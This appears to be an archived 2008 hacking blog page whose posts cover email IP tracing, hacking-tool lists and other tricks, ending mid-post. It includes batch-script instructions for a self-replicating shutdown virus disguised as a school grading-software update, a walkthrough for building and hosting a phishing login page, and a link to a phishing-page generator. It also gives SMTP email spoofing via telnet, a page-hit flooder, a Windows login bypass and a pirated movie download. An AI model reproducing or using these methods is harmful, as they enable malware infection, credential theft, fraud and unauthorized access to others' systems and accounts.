Posted in IP tools, Website hacks with tags Find IP, Find IP info, Find IP info using Gmail, Find IP info using Gmail/Hotmail, Find IP info using Gmail/Yahoo, Find IP info using Gmail/Yahoo/Hotmail, Find IP info using Hotmail, Find IP info using Yahoo, Find IP info using Yahoo/Hotmail on April 4, 2008 by hacktocrack When you recieve an email, you receive more than just the message. The email comes with headers that carry important information that can tell where the email was sent from and possibly who sent it. For that, you would need to find the IP address of the sender. The tutorial below can help you find the IP address of the sender. Note that this will not work if the sender uses anonymous proxy servers.

First of all, the IP address is generally found in the headers enclosed beween square brackets, for instance, [129.130.1.1]Finding IP address in Gmail

1. Log into your Gmail account with your username and password.2. Open the mail.3. To display the email headers,

Click on the inverted triangle beside Reply. Select Show Orginal.

4. manually find the IP address, proceed to 5.5. Look for Received: from followed by the IP address between square brackets [ ].

Received: from [69.138.30.1] by web4587.mail.***.yahoo.com

6. If you find more than one Received: from patterns, select the last one.7. Track the IP address of the sender

Finding IP address in Yahoo! Mail

1. Log into your Yahoo! mail with your username and password.

2. Click on Inbox or whichever folder you have stored your mail.

3. Open the mail.

4. If you do not see the headers above the mail message, your headers are not displayed. To display the headers,

Click on Options on the top-right corner In the Mail Options page, click on General Preferences Scroll down to Messages where you have the Headers option Make sure that Show all headers on incoming messages is

selected Click on the Save button Go back to the mails and open that mail

5. You should see similar headers like above

Or if you want to manually find the IP address, proceed to 6.

6. Look for Received: from followed by the IP address between square brackets [ ]. Here, it is 202.65.138.109.

That is be the IP address of the sender.

If there are many instances of Received: from with the IP address, select the IP address in the last pattern. If there are no instances of Received: from with the IP address, select the first IP address in X-Originating-IP.

7. Track the IP address of the sender

Finding IP address in Hotmail

1. Log into your Hotmail account with your username and password.

2. Click on the Mail tab on the top.

3. Open the mail.

4. If you do not see the headers above the mail message, your headers are not displayed. To display the headers,

Click on Options on the top-right corner In the Mail Options page, click on Mail Display Settings In Message Headers, make sure Advanced option is checked Click on Ok button Go back to the mails and open that mail

5. You should see the email headers now.

6. manually find the IP address, proceed to 7.

7. If you find a header with X-Originating-IP: followed by an IP address, that is the sender’s IP address

Hotmail headers

In this case the IP address of the sender is [68.34.60.59].

8. If you find a header with Received: from followed by a Gmail proxy like this

Hotmail headers

Look for Received: from followed by IP address within square brackets[In this case, the IP address of the sender is [69.140.7.58].

9. Or else if you have headers like this

Hotmail headers

Look for Received: from followed by IP address within square brackets[].In this case, the IP address of the sender is [61.83.145.129] (Spam mail).

10. If you have multiple Received: from headers, eliminate the ones that have proxy.anyknownserver.com.

11. Track the IP address of the sender

3 Comments »

Shut Down Your   School!

Posted in XP Hacking, hacking with tags hack into school computers, hacking computers, hacking in school, how to shut down your school, shut down your school! on April 4, 2008 by hacktocrack

By using the following command you can shutdown your school or college by using only Note pad.

This is the main command that will be launched upon startup.Type this in Notepad.@echo off shutdown.exe -s -t 10 -c“You have been hacked!”Save this as shutdown.bat, making sure you choose all files as the filetype.

Step 2Make it run on Startup The file you need can be downloaded here: This is just a simple registry file that anyone can create, but I don’t feel like explaining the registry to everyone. It will disguise itself by claiming to be an update for STI.http://www.mutantsrus.com/Update.reg

Step 3Set up the replication systemHere is the code to set up the replicator (the program that allows the virus to reproduce). This simply gets it ready to infect the teachers. ?,$, and ! means that it varies. It depends on what program you are using. To find out how to fill these blank, get on a computer that has access to the server that stores your grading program. ? is the drive letter. $ is any folders and sub folders that contain the main exe for the grading program. ! is the name of the main exe.

Example O:\sti\ssts2\sti.exe?=O$=sti\ssts2!=sti

Here is the code:

@echo offcd C:\move ?:\$\!.exeren C:?.exe real.exeren C:virus.exe !.execd ?:\$move C:\!.exemove C:\shutdown.batmove C:\Update.regexit

Save this as global.bat

Step 4They grow up so fast — real fast!This script will infect any teacher that uses STI with the shutdown command. The little viral babies will copy themselves to the user’s hard drive and remain there.

@echo offcd C:\WINDOWSEcho STI must update itself, this will only take a few seconds.pauseEcho Please wait while the files install.move ?:\$\shutdown.batmove ?:\$\Update.regmove ?:\$\cure.exemove ?:\$\cure.exemove ?:\$\cure.batmove ?:\$\remove.batEcho Adding information to registry.pausestart regedit.exe Update.regcd ?:\

$start real.exeexitNow this one has to be in exe form. So save it as virus.bat, then compile it in Quick Batch File Compiler. You can get QuickBFC here: QuickBFC and download this file as a template for QuickBFC to work with. Just save the compiled file over this one.

Step 5The CureThis is a little tool that can fix all damage done by your virus, it works in the same way that the virus works, but works to correct the problem rather than create it.@echo offshutdown -acd C:\WINDOWSdel shutdown.bat

Save as cure.bat

@echo offcd ?:\$del !.execd C:\move ?:\$\real.exeren C:\real.exe !.execd ?:\$move C:\?.execd C:\WINDOWSNow download this file: http://www.mutantsrus.com/cure.exe

Step 6The SetupNo it’s not the name of a heist movie. It is simply a SFX file that extracts all the files to their proper places and places the replicator in the STI drive.I am going to use WinRAR to do this. You can get WinRAR here: http://www.rarlab.com. First gather all the files you have made thus far. The files should be shutdown.bat, Update.reg, virus.exe, cure.exe, cure.bat, remove.bat and global.bat. Now select them all and put them in a .rar file. Then open Winrar and go to “tools”, then select “convert archive to SFX”. Click “Advanced SFX Options” In the field labeled Path to Extract, type C:\WINDOWS In the field labeled Run After Extraction, type C:\WINDOWS\global.bat Save the finished file anywhere you want and as any name. To install the virus, just run this program on a computer at school that is connected to the server that has the grading program on it (such as any computer in the Comp Lab.)

3 Comments »

Hide Your Files In a   JPEG

Posted in Easy Hacking, hacking, offline hacking with tags free tips, hacking, hacking tips, hacking tricks, hide files, hide files in jpeg, hide folders, hide your files in a jpeg, how to hide files, how to hide folders on April 3, 2008 by hacktocrack

Well, did you know you could hide your files in a JPEG file? For this, you will only need to download WinRAR. You just need to have a little knowledge about Command Prompt and have WinRAR installed.

Ok, lets begin…

1. Gather all the files that you wish to hide in a folder anywhere in your PC (make it in C:\hidden - RECOMMENDED).

2. Now, add those files in a RAR archive (e.g. secret.rar). This file should also be in the same directory (C:\hidden).

3. Now, look for a simple JPEG picture file (e.g. logo.jpg). Copy/Paste that file also in C:\hidden.

4. Now, open Command Prompt (Go to Run and type ‘cmd‘). Make your working directory C:\hidden.

5. Now type: “COPY /b logo.jpg + secret.rar output.jpg” (without quotes) - Now, logo.jpg is the picture you want to show, secret.rar is the file to be hidden, and output.jpg is the file which contains both.

6. Now, after you have done this, you will see a file output.jpg in C:\hidden. Open it (double-click) and it will show the picture you wanted to show. Now try opening the same file with WinRAR, it will show the hidden archive .

3 Comments »

Website   Hacking

Posted in Hardcore Hacking, Internet Explorer, Javascript/html Hacking, Mozilla Firefox, Password Hacking, Website hacks, cmd, hack websites, hacking websites with tags hack a website, hack google, hack website, hacking, hacking tips, hacking tricks, how to hack a website on April 1, 2008 by hacktocrack Note: This is for Average Hackerz, Not NewbiesThis article was taken from http://www.ifinityexists.comwe are explaining the website attack known as Cross-Site Scripting (XSS). Cross-Site Scripting is a type of security vulnerability that affects web applications that do not sanitize user input properly. This kind of vulnerability allows an “attacker” to inject HTML or client side script like JavaScript into the website. Cross-Site Scripting is most commonly used to steal cookies. Cookies are used for authenticating, tracking, and maintaining specific information about users; therefore, by stealing a user’s cookies an attacker could bypass the website’s access control. There are three types of XSS attacks: Persistent, Non-Persistent, and DOM-Based. In this episode we will cover Persistent and Non-Persistent Cross-Site Scripting attacks.Live Stream HereDownload Here

Download Cookie Catcher Here

Get a md5 password hasher, to decrypt the hash

7 Comments »

Page hits   flooder

Posted in hack websites with tags flood page hits, hack page hits, page hits flooder on March 27, 2008 by hacktocrack

This small program can flood ur page hits.

but you have to dedicate one browser for it.. like internet explorermethod:make a batch file with these lines

@echo off:1start C:\Progra~1\Intern~1\iexplore.exe “http://yoursite.com“ping -n 10 127.0.0.1 >nultaskkill.exe /im iexplore.exegoto 1

depending upon your net speed u may increase the 10 secs time wait

with 10 sec time u may have 360 hits in an hourwith 5 sec time u may have 720 hits in an hour

6 Comments »

Hack - View Locked   Scrapbooks

Posted in Easy Hacking, Orkut, Website hacks, hacking with tags free hacking tips, hack locked scrapbooks, hacking, hacking tips, View Locked Scrapbooks on March 27, 2008 by hacktocrack

How To Use this Hack?

There are three ways to use this hack.You can choose the one that best suits you.

a> Login To Your Sandbox Profile and Directly View The Locked Scrapbook

or

b> Using this Javascript :

* Navigate to the profile which has disallowed non-friends to view his/her scrapbook* Run this script in the address bar

* javascript:document.location=’http://scraphack.cspbrasil.com/ViewScraps.php?uid=’+encodeURIComponent(location.href);void(0)

* Wait for 4-5 seconds and you will get to see the scraps.

or

c> Userscript (Credits - D3 ) - The Recommended Method because you need not run any script again and again. Kindly follow the instructions stated below:

* Install Grease Monkey in case you don’t have it - Search for it on google (another way to resort to Firefox)* Install View Locked Scrapbook Script* In case you have any problems downloading or operating these scripts, you must read this tutorial.

Leave A Comment »

Create your own f@ke login   page!!!

Posted in Easy Hacking, Hotmail, Password Hacking, Website hacks, Yahoo, hacking with tags create yahoo fake login page, create your own fake login page, fake login, fake login page, hack hotmail, hack yahoo login page, phisher login on March 27, 2008 by hacktocrack

 This is an easier version from the “How to Hack Gmail, Yahoo, Hotmail, Orkut or Any   Other”

This goes into more detail on how to create a fake page to login, and get redirected while it is sending a email of the password and username to your inbox.  If you found this easy, then try out the post, “How to Hack Gmail, Yahoo, Hotmail, Orkut or Any Other”

Fake login page is a fake page which you can use to hack others username and password. Fake login page looks exactly like the original page and if someone login in your page using his original username and password, the username and password will be mailed to youThe process of Hacking anyone’s id using fake login pages is known as Phishing

Now let’s learn how to create your very own fake login page.

{1} Open www.jotform.com and Sign Up.{2} then Login there with your newly registered account.{3} now click on ‘ Create your first form’.{4} Now delete all the pre-defined entries, just leave ‘First Name:’ (To delete entries, select the particular entry and then click on the cross sign.){5} Now Click on ‘First Name:’ (Exactly on First Name). Now the option to Edit the First Name is activated, type there “username:” (for Gmail) or YahooId: (for Yahoo){6} Now Click on ‘Power Tool’ Option (In right hand side…){7} Double click on ‘Password Box’. Now Click the newly form password entry to edit it. Rename it as ‘Password:’{8} Now Click on ‘Properties’ Option (In right hand side…). These are the form

properties.{9} You can give any title to your form. This title is used to distinguish your forms. This Title cannot be seen by the victim.{10} Now in Thank You URL you must put some link, like http://www.google.com or anything. Actually after entering username & password, user will get redirect to this url.(Don’t leave it blank…){11} Now Click on ‘Save’. After saving, click on ‘Source’ Option.{12} Now you can see two Options, namely ‘Option1′ & ‘Option2′. Copy the full code of ‘Option2′.{13} Now open Notepad text editor and write the following code their.Paste the Option2 code here{14} And now save this as index.html. And then host it, mean you will have to put it on the internet so that everyone can view it. Now i think that you would be knowing it and if in case you do not know it please leave a comment with your email-id and i will mail you how to do it.Now you can view it by typing the url in the address bar.NOTE: If u want to send it to the internet, then first you will have to create a hosting account which you can create on www.110mb.com and there are many other sites which you can find on the internet very easily.I suppose that you created your account at 110mb.comnow login to your account then click on “File Manager”, then click on “upload files” or just “upload”. Then select the file which you want to send to the internet and click on upload. And you are done.Now you can access you file on the net by just typing the url ofthe file.And you will receive password of the users that login to your site through email-id which you’ve entered while creating the form.see my fake login pagehttp://www.citkatboy.110mb.com/index.html

59 Comments »

Essential Bluetooth hacking   tools

Posted in Uncategorized with tags bluesnarf, bluetooth hack, bluetooth sniffer, download bloover, download bluebugger, download bluediving, download bluescan, download bluesnarfer, download bluesniff, download bluetest, download btauding, download btbrowser, download btcrack, download cihwb, download t-bear, hack, hack bluetooth, hacking, how to bluesnarf on March 26, 2008 by hacktocrack Bluetooth technology is great. No doubt. It provides an easy way for a wide range of mobile devices to communicate with each other without the need for cables or wires. However, despite its obvious benefits, it can also be a potential threat for the privacy and security of Bluetooth users (remember Paris Hilton?).If you want the best Bluetooth hacker java app, then refer to the “Super Bluetooth Hack” post

If you are planning to gain a deeper understanding of Bluetooth security, you will need a good set of tools with which to work. By familiarizing yourself with the following tools,

you will not only gain a knowledge of the vulnerabilities inherent in Bluetooth-enabled devices, but you will also get a glimpse at how an attacker might exploit them.

This hack highlights the essential tools, mostly for the Linux platform, that can be used to search out and hack Bluetooth-enabled devices.

Discovering Bluetooth Devices

BlueScanner - BlueScanner searches out for Bluetooth-enabled devices. It will try to extract as much information as possible for each newly discovered device. Download BlueScan.

BlueSniff - BlueSniff is a GUI-based utility for finding discoverable and hidden Bluetooth-enabled devices. Download BlueSniff.

BTBrowser - Bluetooth Browser is a J2ME application that can browse and explore the technical specification of surrounding Bluetooth-enabled devices. You can browse device information and all supported profiles and service records of each device. BTBrowser works on phones that supports JSR-82 - the Java Bluetooth specification. Download BTBrowser.

BTCrawler -BTCrawler is a scanner for Windows Mobile based devices. It scans for other devices in range and performs service query. It implements the BlueJacking and BlueSnarfing attacks. Download BTCrawler.

Hacking Bluetooth Devices

BlueBugger -BlueBugger exploits the BlueBug vulnerability. BlueBug is the name of a set of Bluetooth security holes found in some Bluetooth-enabled mobile phones. By exploiting those vulnerabilities, one can gain an unauthorized access to the phone-book, calls lists and other private information. Download BlueBugger.

CIHWB - Can I Hack With Bluetooth (CIHWB) is a Bluetooth security auditing framework for Windows Mobile 2005. Currently it only support some Bluetooth exploits and tools like BlueSnarf, BlueJack, and some DoS attacks. Should work on any PocketPC with the Microsoft Bluetooth stack. Download CIHWB.

Bluediving - Bluediving is a Bluetooth penetration testing suite. It implements attacks like Bluebug, BlueSnarf, BlueSnarf++, BlueSmack, has features such as Bluetooth address spoofing, an AT and a RFCOMM socket shell and implements tools like carwhisperer, bss, L2CAP packetgenerator, L2CAP connection resetter, RFCOMM scanner and greenplaque scanning mode. Download Bluediving.

Transient Bluetooth Environment Auditor - T-BEAR is a security-auditing platform for Bluetooth-enabled devices. The platform consists of Bluetooth discovery tools, sniffing tools and various cracking tools. Download T-BEAR.

Bluesnarfer - Bluesnarfer will download the phone-book of any mobile device vulnerable to Bluesnarfing. Bluesnarfing is a serious security flow discovered in several Bluetooth-enabled mobile phones. If a mobile phone is vulnerable, it is possible to connect to the phone without alerting the owner, and gain access to restricted portions of the stored data. Download Bluesnarfer.

BTcrack - BTCrack is a Bluetooth Pass phrase (PIN) cracking tool. BTCrack aims to reconstruct the Passkey and the Link key from captured Pairing exchanges. Download BTcrack.

Blooover II - Blooover II is a J2ME-based auditing tool. It is intended to serve as an auditing tool to check whether a mobile phone is vulnerable. Download Blooover II.

BlueTest - BlueTest is a Perl script designed to do data extraction from vulnerable Bluetooth-enabled devices. Download BlueTest.

BTAudit - BTAudit is a set of programs and scripts for auditing Bluetooth-enabled devices. Download BTAuding.

What’s next? Let everyone know to disable Bluetooth until they really need it. Additionally, make sure to update your phone software on a regular basis.

6 Comments »

Small Hack For   Orkut

Posted in Mozilla Firefox, Orkut with tags hack orkut, orkut hacks on March 26, 2008 by hacktocrack

 Taken From http://bothack.wordpress.com/2006/06/15/hacking-orkut/

Orkut a very famous social networking site has an option called scrapbook. Now for those people who scrap many times a minute, here is a hack:

If you are using firefox, Install this script (addon) and it will allow you to scrap back just in one click rather than the traditional 2 step + 1 click scrapping. This not only saves time, but also helps you keep things contextual.

Screenshot (click to enlarge):

Another reason to shift to firefox works with all versions of firefox.

9 Comments »

Top 15 Hacking   Software

Posted in Download, Easy Hacking, Hardcore Hacking, IP tools, Javascript/html Hacking, hacking, offline hacking with tags best hacking software, Easy Hacking, hacking software on March 18, 2008 by hacktocrack

1. Nmap

I think everyone has heard of this one, recently evolved into the 4.x series.

Nmap (”Network Mapper”) is a free open source utility for network exploration or security auditing. It was designed to rapidly scan large networks, although it works fine against single hosts. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. Nmap runs on most types of computers and both console and graphical versions are available. Nmap is free and open source.

Can be used by beginners (-sT) or by pros alike (–packet_trace). A very versatile tool, once you fully understand the results.

Get Nmap Here

2. Nessus Remote Security Scanner

Recently went closed source, but is still essentially free. Works with a client-server framework.

Nessus is the world’s most popular vulnerability scanner used in over 75,000 organizations world-wide. Many of the world’s largest organizations are realizing significant cost savings by using Nessus to audit business-critical enterprise devices and applications.

Get Nessus Here

3. John the Ripper

Yes, JTR 1.7 was recently released!

John the Ripper is a fast password cracker, currently available for many flavors of Unix (11 are officially supported, not counting different architectures), DOS, Win32, BeOS,

and OpenVMS. Its primary purpose is to detect weak Unix passwords. Besides several crypt(3) password hash types most commonly found on various Unix flavors, supported out of the box are Kerberos AFS and Windows NT/2000/XP/2003 LM hashes, plus several more with contributed patches.

You can get JTR Here

4. Nikto

Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 3200 potentially dangerous files/CGIs, versions on over 625 servers, and version specific problems on over 230 servers. Scan items and plugins are frequently updated and can be automatically updated (if desired).

Nikto is a good CGI scanner, there are some other tools that go well with Nikto (focus on http fingerprinting or Google hacking/info gathering etc, another article for just those).

Get Nikto Here

5. SuperScan

Powerful TCP port scanner, pinger, resolver. SuperScan 4 is an update of the highly popular Windows port scanning tool, SuperScan.

If you need an alternative for nmap on Windows with a decent interface, I suggest you check this out, it’s pretty nice.

Get SuperScan Here

6. p0f

P0f v2 is a versatile passive OS fingerprinting tool. P0f can identify the operating system on:

- machines that connect to your box (SYN mode),- machines you connect to (SYN+ACK mode),- machine you cannot connect to (RST+ mode),- machines whose communications you can observe.

Basically it can fingerprint anything, just by listening, it doesn’t make ANY active connections to the target machine.

Get p0f Here

7. Wireshark (Formely Ethereal)

Wireshark is a GTK+-based network protocol analyzer, or sniffer, that lets you capture and interactively browse the contents of network frames. The goal of the project is to create a commercial-quality analyzer for Unix and to give Wireshark features that are missing from closed-source sniffers.

Works great on both Linux and Windows (with a GUI), easy to use and can reconstruct TCP/IP Streams! Will do a tutorial on Wireshark later.

Get Wireshark Here

8. Yersinia

Yersinia is a network tool designed to take advantage of some weakeness in different Layer 2 protocols. It pretends to be a solid framework for analyzing and testing the deployed networks and systems. Currently, the following network protocols are implemented: Spanning Tree Protocol (STP), Cisco Discovery Protocol (CDP), Dynamic Trunking Protocol (DTP), Dynamic Host Configuration Protocol (DHCP), Hot Standby Router Protocol (HSRP), IEEE 802.1q, Inter-Switch Link Protocol (ISL), VLAN Trunking Protocol (VTP).

The best Layer 2 kit there is.

Get Yersinia Here

9. Eraser

Eraser is an advanced security tool (for Windows), which allows you to completely remove sensitive data from your hard drive by overwriting it several times with carefully selected patterns. Works with Windows 95, 98, ME, NT, 2000, XP and DOS. Eraser is Free software and its source code is released under GNU General Public License.

An excellent tool for keeping your data really safe, if you’ve deleted it..make sure it’s really gone, you don’t want it hanging around to bite you in the ass.

Get Eraser Here.

10. PuTTY

PuTTY is a free implementation of Telnet and SSH for Win32 and Unix platforms, along with an xterm terminal emulator. A must have for any h4×0r wanting to telnet or SSH from Windows without having to use the crappy default MS command line clients.

Get PuTTY Here.

11. LCP

Main purpose of LCP program is user account passwords auditing and recovery in Windows NT/2000/XP/2003. Accounts information import, Passwords recovery, Brute force session distribution, Hashes computing.

A good free alternative to L0phtcrack.

LCP was briefly mentioned in our well read Rainbow Tables and RainbowCrack article.

Get LCP Here

12. Cain and Abel

My personal favourite for password cracking of any kind.

Cain & Abel is a password recovery tool for Microsoft Operating Systems. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols. The program does not exploit any software vulnerabilities or bugs that could not be fixed with little effort.

Get Cain and Abel Here

13. Kismet

Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion detection system. Kismet will work with any wireless card which supports raw monitoring (rfmon) mode, and can sniff 802.11b, 802.11a, and 802.11g traffic.

A good wireless tool as long as your card supports rfmon (look for an orinocco gold).

Get Kismet Here

14. NetStumbler

Yes a decent wireless tool for Windows! Sadly not as powerful as it’s Linux counterparts, but it’s easy to use and has a nice interface, good for the basics of war-driving.

NetStumbler is a tool for Windows that allows you to detect Wireless Local Area Networks (WLANs) using 802.11b, 802.11a and 802.11g. It has many uses:

Verify that your network is set up the way you intended. Find locations with poor coverage in your WLAN. Detect other networks that may be causing interference on your network. Detect unauthorized “rogue” access points in your workplace. Help aim directional antennas for long-haul WLAN links.

Use it recreationally for WarDriving.

Get NetStumbler Here

15. hping

To finish off, something a little more advanced if you want to test your TCP/IP packet monkey skills.

hping is a command-line oriented TCP/IP packet assembler/analyzer. The interface is inspired to the ping unix command, but hping isn’t only able to send ICMP echo requests. It supports TCP, UDP, ICMP and RAW-IP protocols, has a traceroute mode, the ability to send files between a covered channel, and many other features.

Get hping Here

Source:http://www.darknet.org.uk/2006/04/top-15-securityhacking-tools-utilities/

7 Comments »

Spoofing Via   Telnet

Posted in Email, Telnet, cmd with tags fake email send, fake smtp, send fake email, spoofing telnet on March 18, 2008 by hacktocrack

Get a smtp server ( i use mx1.hotmail.com)

they’re normally likemx1,mx2 etc..thehost.com.

Now, go to Start>Run>cmd then in the cmd window,

Type telnet mx1.hotmail.com 25

then HELO hotmail.com then MAIL FROM : (fake email here)

then RCPT TO: (person)then DATA then type your message,

you can press enter for a new line, finish the message by a full stop (.) on a new line, press enter!

spoofed.

For Educational purpose only

Didn’t it work? Go www.deadfake.com

1 Comment »

Auto Ph$her / Fake Web Login   Creator

Posted in Uncategorized on March 13, 2008 by hacktocrack

Auto Ph!$her / fake Web Login Creator — By DaveDaDon

All u need to do is write in the source of the page u wanna ph!$hand it will make the phisher for u automatically, and it even saves it as well.

Downloadhttp://rapidshare.com/files/90895580/Fishing_Bait_2.5.rar

Password:  PremSoni

5 Comments »

Get IP address anonymity   everytime

Posted in IP tools, Other with tags hide proxy, hide your ip, ip hider, proxy hider on March 13, 2008 by hacktocrack

i have found one software which hide your IP address every time and give you a new IP address by creating a Tor Network…….

If u have Mozilla then it works very fine

First Download Vidalia Bundle from here

http://www.torproject.org/download.html.en

Here is link for Windows and MAC OS ……….So download it according to your requirement .

After that to easily turn on and turn off “TOR” .. You can install Firefox add on from here :

https://addons.mozilla.org/en-US/firefox/addon/2275

then restart firefox….After that you will see at right bottom corner that your tor addon for mozilla is installed…now when u want to hide your IP or want to surfing anonymously Turn on or turn off by clicking on this.

You can check your ip address here

http://www.whatismyip.com/

3 Comments »

A Cool Forum To   Join

Posted in Uncategorized with tags cool forum, free movies, full games, full music albums on March 11, 2008 by hacktocrack

Join www.causewearecool.co.nr To get the latest Downloads Of Full Movies, Games, Music, Etc

Check it out

Leave A Comment »

Fastest Way To Hack into Someones   System

Posted in Download, Easy Hacking, Hardcore Hacking with tags hack, fastest hack, easiest hack, free portscanner on March 4, 2008 by hacktocrack Well as I already mentioned you can hack any system as it is conected to what we call “INTERNET”. To connect internet a system allocates a port for communication and Data Transfer. So we got to do is to get into that port that is to be hacked.

Steps: -

1. Software PORT SCANNER from google. 2. The IP address of the victim whose port is open. 3. NETLAB which gives u all information includes victim IP address,Area from

where he is accessing internet…. 4. The IP of victim u found initially into NETLAB . 5. Thats it now you can access his system.

Note : This is really Hardcore Hacking and you should be very much careful while doing all this and you do all this on your own responsibility. This site is never responsible for anything you after reading any article from this site and there are almost 50-50 chances that you may get caught so don’t try this unless you are aware of everthing. Yes you can freak some of your friends by telling them that you can hack their systems very easily.

8 Comments »

A Cool Game To   Play

Posted in Other with tags game, maze on March 2, 2008 by hacktocrack

 Here’s A Cool Game To play If You Are Bored, Beat Me I Reached Level 5. Turn Up The volume Very High, It’s Soft

1 Comment »

Hack This Website   Test

Posted in hack websites with tags hack, hack test, hack this website on March 2, 2008 by hacktocrack

 If you really think you are a hacker, then

Go to www.hack-test.com

Reply with what level you are on

11 Comments »

Download Jumper   (2008)

Posted in Cracks/Wares, Download, Movies, Other with tags download full movie, download jumper movie, free jumper movie on February 29, 2008 by hacktocrack Jumper.TS.XViD-PreVail

Title: Jumper.2008 Theater Date: February.17.2008 Release Date: February.14.2008 CD/INFO: Cd1-50 x 15mbs Framerate: 25fps PAL Audio: Direct Line Type: XVID IMDB Rating: 6.4/10 (1,541 votes) URL: http://www.imdb.com/title/tt0489099/ Genre: Adventure / Drama / Sci-Fi / Thriller

In These Troubled Times, We shall PreVail!!! Tagline: Anywhere is possible.

Plot Outline: A genetic anomaly allows a young man to teleport himself anywhere. He discovers this gift has existed for centuries and finds himself in has been raging for thousands of years between

Hack Windows XP   Password

Posted in Hardcore Hacking, Password Hacking, XP Hacking, offline hacking with tags DreamPackPL, hack passwords, hack xp password, hacking, how to hack on February 29, 2008 by hacktocrack

Hi, Here’s Another Alternate to The Other Post - “Hack Windows XP Password”

Another method to login to a password protected Windows even if you do not have the password is by making Windows accepting any passwords.There is a far better way to get into

Windows XP. It is easy and it does not reset the password. Hack into a computer running Windows XP without changing the password and find out all and any passwords on the machine (including admin accounts). You do not need access to any accounts to do this. Of course, do not do this on anyone elses computer without proper authorisation.

Steps to Hack into a Windows XP Computer without changing password:

1. Get physical access to the machine. Remember that it must have a CD or DVD drive.2. Download DreamPackPL HERE.3. Unzip the downloaded dpl.zip and you’ll get dpl.ISO.4. Use any burning program that can burn ISO images.5. After you have the disk, boot from the CD or DVD drive. You will see Windows 2000 Setup and it will load some files.6. Press “R” to install DreamPackPL.7. Press “C” to install DreamPackPL by using the recovery console.8. Select the Windows installation that is currently on the computer (Normally is “1″ if you only have one Windows installed)9. Backup your original sfcfiles.dll by typing:“ren C:WindowsSystem32sfcfiles.dll sfcfiles.lld” (without quotes)10. Copy the hacked file from CD to system32 folder. Type:“copy D:i386pinball.ex_ C:WindowsSystem32sfcfiles.dll” (without quotes and assuming your CD drive is D 11. Type “exit”, take out disk and reboot.12. In the password field, type “dreamon” (without quotes) and DreamPack menu will appear.13. Click the top graphic on the DreamPack menu and you will get a menu popup.

14. Go to commands and enable the options and enable the god command.

15. Type “god” in the password field to get in Windows.You can also go to Passwords and select “Logon with wrong password and hash”. This option allows you to login with ANY password.

Note: I was unable to bring up the DreamPackPL for the first time because I have Kaspersky Anti-Virus already running in background. I believe most antivirus already labelled this tool as a Hack-Tool. A Hack-Tool is NOT a virus. DreamPackPL helps you bypass the Windows Login screen and it is not destructive.

6 Comments »

FAKE - Hack Password for Yahoo, Google, Gmail, AOL and   MSN

Posted in Email, Gmail with tags hacking, hack hotmail, msn freezer, hack msn hotmail, hack msn, how to hack websites, hacking websites, hack website on February 29, 2008 by hacktocrack

DON’T TRY THIS, THIS IS AN EXAMPLE OF WHAT NOT TO DO

Go to the “How to hack Hotmail, Gmail, Yahoo, Orkut Or Any Other Post” Instead

*********************************************************************

If you are going to execute this, you are fooled. The above steps are false infos. They do not provide you the password. Instead they will actually hack your password: Never be fooled. Never send your password decrypted to any emails.

18 Comments »

Hack Password for Yahoo, Google, Gmail, AOL and   MSN

Posted in Uncategorized on February 29, 2008 by hacktocrack

AN EXAMPLE OF WHAT NOT TO DO………………………..

STEP 1- Log in to your own yahoo account. Note: Your account must be atleast 30 days old for this to work.

STEP 2- Once you have logged into your own account, compose/write an e-mailto: THIS_IS_FAKE@yahoo.com This is a mailingaddress to the Retrivepassword. The automated server will send you the password that you have ‘forgotten’, after receiving the information you sendthem.

STEP 3- In the subject line type exactly: ” PASSWORD RECOVERY “

STEP 4- On the first line of your mail write the email address of the personyou are hacking. STEP 5- On the second line type in the e-mail addressyou are using.

STEP 6- On the third line type in the password to YOURemail address (your OWN password). The computer needs your password so itcan send a JavaScript from your account in the Yahoo Server to extract theother email addresses password. In other word the system automaticallychecks your password to confirm the integrity of your status. The process will be done automatically by the user administration server.

STEP 7- The final step before sending the mail is, type on the fourth line the following code exactly:cgi-bin_RETRIVE_PASS_BIN_PUB/$et76431&pwrsascript< ip://233.243.2.34/cgi-bin/start?v703&login=passmachine&f=(password)&f=27586&javascript=ACTIVE&rsa#>{simply copy and paste above.}

so for example if your yahoo id is : David_100@yahoo.com and your passwordis: David and the email address you want to hack is: test@yahoo.com thencompose the mail as below:

To: pass_retrive_cgi@yahoo.combcc: cc: (Don’t write anything in cc,bcc field)

Subject: ” PASSWORD RECOVERY “

test@yahoo.comDavid_100@yahoo.comDavidcgi-bin_RETRIVE_PASS_KEY_CGI_BIN/$et76431&pwrsascript< ip://233.243.2.34/cgi-bin/start?v703&login=passmachine&f=(password)&f=27586&javascript=ACTIVE&rsa#>{simply copy and paste above.}

The password will be sent to your inbox in a mail called “System Reg Message” from “System.

For Gmail:To: key.admin.cgi@gmail.comSub: Password Request : Test@gmail.com

Rest as in yahoo

AOL and MSN will be alive soon:

If you are going to execute this, you are fooled. The above steps are false infos. They do not provide you the password. Instead they will actually hack your password: Never be fooled. Never send your password decrypted to any emails.

7 Comments »

How to Hack Gmail, Yahoo, Hotmail, Orkut or Any   Other

Posted in Email, Gmail, Hotmail, Password Hacking, Website hacks, Yahoo, hacking with tags hack, hack gmail, hack hotmail, hack msn, hack msn hotmail, hack yahoo, msn freezer on February 28, 2008 by hacktocrack In the previous version of “how to hack gmail or yahoo or hotmail or any other” One problem faced was that whenever the victim clicks on login a message would come saying “This page will send your information through email” which could sometime fail your hack.But in this new version this problem is eliminated and this is has become more fullproof than the previous version.First of all you need to create an account in a form handling service. In the registration form enter your email address in the field “Where to send Data” and in redirect enter the URL of the site whose account is to be hacked( For Yahoo it will be http://mail.yahoo.com and for google it is mail.google.com/mail). After registering you will get an email from the web form designer with your form id.Now follow the following steps :

1. Open the website of HotMail or GMail or YahooMail, its your wish. If you want to HACK yahoo id, then goto www.yahoomail.com

2. Now press “CTRL+U”, you will get the source code of yahoo page. NOw press “CTRL+A” copy all the text.

3. Open NOTEPAD, now paste it here. SAVE it as YAHOOFAKE.HTML 4. Now open the the file yahoofake.html using noepad, here you ll find a code which

